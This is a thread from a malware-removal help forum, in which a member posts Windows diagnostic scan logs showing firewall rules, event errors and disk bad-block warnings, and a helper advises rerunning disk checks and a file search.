FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Restore Points =========================
24-01-2017 15:52:44 Scheduled Checkpoint
31-01-2017 20:53:13 end January 2017
01-02-2017 17:15:49 JRT Pre-Junkware Removal
01-02-2017 17:24:34 JRT Pre-Junkware Removal
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/02/2017 10:34:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.
Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.
Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/02/2017 10:19:09 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
Description: Activation of app Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/02/2017 10:12:33 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/02/2017 10:09:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
Description: Activation of app Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
Exception code: 0xc0000005
Fault offset: 0x000000000002f7db
Faulting process id: 0xd20
Faulting application start time: 0x01d27cfa9f3c35eb
Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
Faulting package full name:
Faulting package-relative application ID:
Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function: PolicyBase::takeControlOfOsc
Message: Failed to acquire OSC: Failure during execution of _OSC:
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function: EsifServices::primitiveExecuteSet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Policy: Passive Policy 2 [2]
System errors:
=============
Error: (02/02/2017 12:06:30 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:26 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:22 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:18 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:14 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:10 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:06 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:06:02 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:05:59 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/02/2017 12:05:55 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
CodeIntegrity:
===================================
Date: 2017-02-01 21:18:20.909
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-02-01 21:18:20.659
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
Percentage of memory in use: 19%
Total physical RAM: 16273.91 MB
Available physical RAM: 13087.01 MB
Total Virtual: 18705.91 MB
Available Virtual: 15448.3 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:831.09 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)
Partition: GPT.
==================== End of Addition.txt ============================
Member
I run the Disk Error Tool and it showed no errors... Is there anything else I can try?
Member
Thank you for all of your help!
Malware Expert
I do not see my search.txt file. Did you perhaps hit SCAN instead of File Search? Please try it again.
As far as the bad block error is concerned it appears to still be there. Somewtimes you have to run the disk check several times to clear it. Windows is a bit odd on hard drive numbering so if you have any other drives, even USB type then run the disk check on them
Member
Got it! sorry about that
Farbar Recovery Scan Tool (x64) Version: 29-01-2017
Ran by Joseph (02-02-2017 13:06:15)
Running from C:\Users\Joseph\Downloads
Boot Mode: Normal
================== Search Files: "update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt" =============
====== End of Search ======
Member
I did regular search, not regestry search
Edited by mw201, 02 February 2017 - 12:17 PM.
0 members, 0 guests, 0 anonymous users
Community Forum Software by IP.Board
Licensed to: Geeks to Go, Inc.
Sign In
Create Account
